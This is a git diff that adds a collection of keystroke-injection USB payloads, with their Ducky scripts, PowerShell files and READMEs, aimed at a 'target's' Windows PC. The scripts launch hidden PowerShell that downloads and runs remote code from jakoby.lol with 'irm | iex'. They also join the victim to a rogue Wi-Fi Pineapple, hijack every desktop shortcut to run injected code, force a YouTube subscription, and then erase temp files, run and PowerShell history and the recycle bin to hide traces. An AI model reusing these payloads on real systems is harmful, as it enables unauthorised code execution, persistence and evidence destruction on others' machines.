+STRING $XMLFILE > ($profilefile)
+SHIFT ENTER
+STRING netsh wlan add profile filename="$($profilefile)"
+SHIFT ENTER
+STRING netsh wlan connect name=$SSID
+SHIFT ENTER
+STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
+REM
+DELAY 500
+ENTER
diff --git a/Payloads/PineApple/PineApple.ps1 b/Payloads/PineApple/PineApple.ps1
new file mode 100644
index 0000000..bc4fe83
--- /dev/null
+++ b/Payloads/PineApple/PineApple.ps1
@@ -0,0 +1,52 @@
+$profilefile="Home.xml"
+$SSID="PineApple"
+$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+$xmlfile="
+
+$SSID
+
+
+$SSIDHEX
+$SSID
+
+
+ESS
+manual
+
+
+
+open
+none
+false
+
+
+
+
+"
+$XMLFILE > ($profilefile)
+netsh wlan add profile filename="$($profilefile)"
+netsh wlan connect name=$SSID
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+iwr "https://jakoby.lol/hak5" -EA 0 >$null
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/PineApple/PineApple.txt b/Payloads/PineApple/PineApple.txt
new file mode 100644
index 0000000..4b12bda
--- /dev/null
+++ b/Payloads/PineApple/PineApple.txt
@@ -0,0 +1,17 @@
+REM Title: PineApple
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
+REM The powershell script needed is provided as OMG-PineApple.ps1
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/PineApple/README.md b/Payloads/PineApple/README.md
new file mode 100644
index 0000000..67f48d4
--- /dev/null
+++ b/Payloads/PineApple/README.md
@@ -0,0 +1,109 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# PineApple
+
+A script used to connect a targets PC to your Wifi PineApple.
+
+## Description
+
+This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
+The XML file will be manually entered into a PowerShell window.
+The PowerShell window and run box will be erased for a clean exit.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* The entire script will be manually entered into the powershell window
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+
+(back to top)
diff --git a/Payloads/Play-WAV/Play-WAV.ps1 b/Payloads/Play-WAV/Play-WAV.ps1
new file mode 100644
index 0000000..983538d
--- /dev/null
+++ b/Payloads/Play-WAV/Play-WAV.ps1
@@ -0,0 +1,93 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script requires you to have a DropBox account or another file hosting service
+
+.DESCRIPTION
+ This program downloads a sound from your DropBox
+ Turns the volume to max level on victims PC
+ Pauses the script until a mouse movement is detected
+ Then plays the sound with nothing popping up catching your victim off guard
+ Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
+
+#>
+
+############################################################################################################################################################
+
+# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
+# This is for if you want to host your own instance of this script
+
+#$wav = ""
+
+iwr $wav -O $env:TMP\e.wav
+
+############################################################################################################################################################
+
+# This turns the volume up to max level
+$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+############################################################################################################################################################
+
+# This while loop will constantly check if the mouse has been moved
+# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
+# it will then sleep for the indicated number of seconds and check again
+
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+############################################################################################################################################################
+
+# Play Sound
+$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
+
+############################################################################################################################################################
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
diff --git a/Payloads/Play-WAV/Play-WAV.txt b/Payloads/Play-WAV/Play-WAV.txt
new file mode 100644
index 0000000..2b25a3c
--- /dev/null
+++ b/Payloads/Play-WAV/Play-WAV.txt
@@ -0,0 +1,16 @@
+REM Title: Play-WAV
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex
+DELAY 500
+ENTER
diff --git a/Payloads/Play-WAV/README.md b/Payloads/Play-WAV/README.md
new file mode 100644
index 0000000..17ae6b9
--- /dev/null
+++ b/Payloads/Play-WAV/README.md
@@ -0,0 +1,114 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Play-WAV
+
+A script used to download a WAV file and play it after a mouse movement is detected.
+
+## Description
+
+This program starts off by using an Invoke-WebRequest to download a WAV file.
+The system volume is then turned up to the max level.
+Then the script will be paused until a mouse movement is detected.
+After a mouse movement is detected, the WAV file will be played.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Place the WAV URL in the $wav variable
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download your WAV file
+
+```
+powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+(back to top)
diff --git a/Payloads/Rage-PopUps/Rage-PopUps.ps1 b/Payloads/Rage-PopUps/Rage-PopUps.ps1
new file mode 100644
index 0000000..aaa4357
--- /dev/null
+++ b/Payloads/Rage-PopUps/Rage-PopUps.ps1
@@ -0,0 +1,74 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers.
+
+.DESCRIPTION
+ This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up
+ for each one of them.
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+Add-Type -AssemblyName System.Windows.Forms
+
+# The number of times you want it to cycle through your list of questions
+
+$cycles = 3
+
+# List as many questions here as you like, it will cycle through all of them
+
+$msgs = @(
+"Are all scammers as dumb as you?"
+"Is the pay worth being this big of a loser?"
+"Do your parents know what you do for a living?"
+"Does you boss know much much you suck at this job?"
+)
+
+for ($i=1; $i -le $cycles; $i++) {
+
+Foreach ($msg in $msgs) {
+[System.Windows.Forms.MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question')
+}
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/Rage-PopUps/Rage-PopUps.txt b/Payloads/Rage-PopUps/Rage-PopUps.txt
new file mode 100644
index 0000000..bdb3c2f
--- /dev/null
+++ b/Payloads/Rage-PopUps/Rage-PopUps.txt
@@ -0,0 +1,16 @@
+REM Title: Rage-PopUps
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+DELAY 500
+ENTER
diff --git a/Payloads/ShortcutJacker/README.md b/Payloads/ShortcutJacker/README.md
new file mode 100644
index 0000000..47e50af
--- /dev/null
+++ b/Payloads/ShortcutJacker/README.md
@@ -0,0 +1,150 @@
+
+
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Shortcut Jacker
+
+
+
+ 
+
+
YouTube Tutorial
+
+
+A script used to embed malware in the shortcut on your target's desktop.
+
+## Description
+
+This payload will run a PowerShell script in the background of any shortcut used on the target's desktop.
+
+This is done by taking advantage of the `Target` field where PowerShell commands can be stored or run.
+
+This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run.
+
+So if your command exceeds that, consider using an IWR function to download and execute a longer script.
+
+I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
+
+
+
+Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored.
+
+---------------------------------------------------------------------------------------------------------------------------------------------------------
+
+
+
+---------------------------------------------------------------------------------------------------------------------------------------------------------
+
+Using the `Get-Shortcut` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the `Target` field.
+
+
+
+## Getting Started
+
+Once the script is executed, all of the shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
+
+
+
diff --git a/Payloads/ShortcutJacker/Shortcut-Jacker-Execute.txt b/Payloads/ShortcutJacker/Shortcut-Jacker-Execute.txt
new file mode 100644
index 0000000..45a9edb
--- /dev/null
+++ b/Payloads/ShortcutJacker/Shortcut-Jacker-Execute.txt
@@ -0,0 +1,10 @@
+REM Title: Shortcut-Jacker
+REM Author: I am Jakoby
+REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
+REM Target: Windows 10, 11
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass iwr LINK | iex
+ENTER
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
diff --git a/Payloads/ShortcutJacker/Shortcut-Jacker.ps1 b/Payloads/ShortcutJacker/Shortcut-Jacker.ps1
new file mode 100644
index 0000000..83603c4
--- /dev/null
+++ b/Payloads/ShortcutJacker/Shortcut-Jacker.ps1
@@ -0,0 +1,118 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This is payload used to inject PowerShell code into shortcuts.
+
+.DESCRIPTION
+ This payload will gather information on the shortcuts on your targets desktop.
+ That data will then be manipulated to embed a PowerShell script.
+ This script will be ran in the background when the short cut is.
+
+#>
+
+############################################################################################################################################################
+
+<#
+.NOTES
+ The PowerShell code stored in this variable is what will run in the background.
+ This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
+ variable and it will still run.
+#>
+
+$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')"
+
+############################################################################################################################################################
+
+function Get-Shortcut {
+ param(
+ $path = $null
+ )
+
+ $obj = New-Object -ComObject WScript.Shell
+
+ if ($path -eq $null) {
+ $pathUser = [System.Environment]::GetFolderPath('StartMenu')
+ $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')
+ $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse
+ }
+ if ($path -is [string]) {
+ $path = dir $path -Filter *.lnk
+ }
+ $path | ForEach-Object {
+ if ($_ -is [string]) {
+ $_ = dir $_ -Filter *.lnk
+ }
+ if ($_) {
+ $link = $obj.CreateShortcut($_.FullName)
+
+ $info = @{}
+ $info.Hotkey = $link.Hotkey
+ $info.TargetPath = $link.TargetPath
+ $info.LinkPath = $link.FullName
+ $info.Arguments = $link.Arguments
+ $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}
+ $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}
+ $info.WindowStyle = $link.WindowStyle
+ $info.IconLocation = $link.IconLocation
+
+ return $info
+ }
+ }
+}
+
+#-----------------------------------------------------------------------------------------------------------
+
+function Set-Shortcut {
+ param(
+ [Parameter(ValueFromPipelineByPropertyName=$true)]
+ $LinkPath,
+ $IconLocation,
+ $Arguments,
+ $TargetPath
+ )
+ begin {
+ $shell = New-Object -ComObject WScript.Shell
+ }
+
+ process {
+ $link = $shell.CreateShortcut($LinkPath)
+
+ $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |
+ Where-Object { $_.key -ne 'LinkPath' } |
+ ForEach-Object { $link.$($_.key) = $_.value }
+ $link.Save()
+ }
+}
+
+#-----------------------------------------------------------------------------------------------------------
+
+function hijack{
+$Link = $i.LinkPath
+$Loc = $i.IconLocation
+$TargetPath = $i.TargetPath
+if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"}
+$Target = $i.Target
+if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}
+}
+
+#-----------------------------------------------------------------------------------------------------------
+
+Get-ChildItem βPath "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}
diff --git a/Payloads/Subscribe/README.md b/Payloads/Subscribe/README.md
new file mode 100644
index 0000000..b8b3966
--- /dev/null
+++ b/Payloads/Subscribe/README.md
@@ -0,0 +1,111 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Subscribe
+
+A script I put together to make your target subscribe to your YouTube channel.
+
+## Description
+
+This script is set to open your YouTube account in their browser where they will be prompted to subscribe to you.
+SPOILER: They do.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+* Your target will have to be signed into their YouTube account
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* 15 seconds later you have a new subscriber
+* Your youtube url needs to be inside both double and single quotes " ' url ' "
+```
+powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Subscribe/Subscribe.ps1 b/Payloads/Subscribe/Subscribe.ps1
new file mode 100644
index 0000000..a5c6c2f
--- /dev/null
+++ b/Payloads/Subscribe/Subscribe.ps1
@@ -0,0 +1,38 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.DESCRIPTION
+ This program is designed to get your target to subscribe to your YouTube channel.
+#>
+#############################################################################################################################################
+
+# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself
+
+# $channel = "https://www.youtube.com/iamjakoby"
+
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$url = -join($channel,"?sub_confirmation=1")
+Start-Process "$url"
+Start-Sleep -Seconds 5
+[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
+[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
+Start-Sleep -Seconds 1
+[System.Windows.Forms.SendKeys]::SendWait('%{F4}')
diff --git a/Payloads/Subscribe/Subscribe.txt b/Payloads/Subscribe/Subscribe.txt
new file mode 100644
index 0000000..4794e7a
--- /dev/null
+++ b/Payloads/Subscribe/Subscribe.txt
@@ -0,0 +1,14 @@
+REM Title: Subscribe
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to make your target subscribe to your YouTube channel
+
+REM Target: Windows 10, 11
+
+REM Your youtube url needs to be inside both double and single quotes " ' url ' "
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex
+ENTER
diff --git a/Payloads/WallPaper-URL/ReadMe.md b/Payloads/WallPaper-URL/ReadMe.md
new file mode 100644
index 0000000..34a4c96
--- /dev/null
+++ b/Payloads/WallPaper-URL/ReadMe.md
@@ -0,0 +1,112 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Wallpaper-URL
+
+This payload will download an image from any URL and set it as the target's wallpaper.
+
+## Description
+
+Use this program to troll your friends. Find any image online and grab the URL and insert it into the PS1 script.
+Run this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes.
+Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the PowerShell and run box history will be wiped.
+
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* Place your images URL in the $url variable
+```
+powershell -w h -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/WallPaper-URL/Wallpaper-URL.ps1 b/Payloads/WallPaper-URL/Wallpaper-URL.ps1
new file mode 100644
index 0000000..c287a83
--- /dev/null
+++ b/Payloads/WallPaper-URL/Wallpaper-URL.ps1
@@ -0,0 +1,103 @@
+# URL is for if you want to host your own copy of this payload
+
+#$url = ""
+
+
+$wp = "$Env:tmp\---wp.png"
+
+iwr $url -O $wp
+
+Function Set-WallPaper {
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+function Target-Comes {
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+function Clean-Exfil {
+
+# empty temp folder
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# delete run box history
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Empty recycle bin
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+}
+
+Target-Comes
+Set-WallPaper -Image $wp -Style Fill
+Clean-Exfil
diff --git a/Payloads/WallPaper-URL/Wallpaper-URL.txt b/Payloads/WallPaper-URL/Wallpaper-URL.txt
new file mode 100644
index 0000000..4baa526
--- /dev/null
+++ b/Payloads/WallPaper-URL/Wallpaper-URL.txt
@@ -0,0 +1,16 @@
+REM Title: Wallpaper-Troll
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload will change your targets wallpaper to an image from a provided url
+REM Target: Windows 10, 11
+REM
+REM --------------------------------------------------------------------------------------
